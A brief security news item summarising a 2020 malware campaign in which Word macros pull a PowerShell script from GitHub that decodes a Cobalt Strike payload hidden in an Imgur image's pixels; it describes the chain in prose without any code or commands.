Security News > 2020 > December > GitHub-hosted malware calculates Cobalt Strike payload from Imgur pic
A new strand of malware uses Word files with macros to download a PowerShell script from GitHub.
This PowerShell script further downloads a legitimate image file from image hosting service Imgur to decode a Cobalt Strike script on Windows systems.
Word macro spins up PowerShell script hosted on GitHub.
Decoded script executes Cobalt Strike payload. The decoded script obtained from manipulating the PNG's pixel values is a Cobalt Strike script.
Cobalt Strike is a legitimate penetration testing toolkit that allows attackers to deploy "Beacons" on compromised devices to remotely "Create shells, execute PowerShell scripts, perform privilege escalation, or spawn a new session to create a listener on the victim system."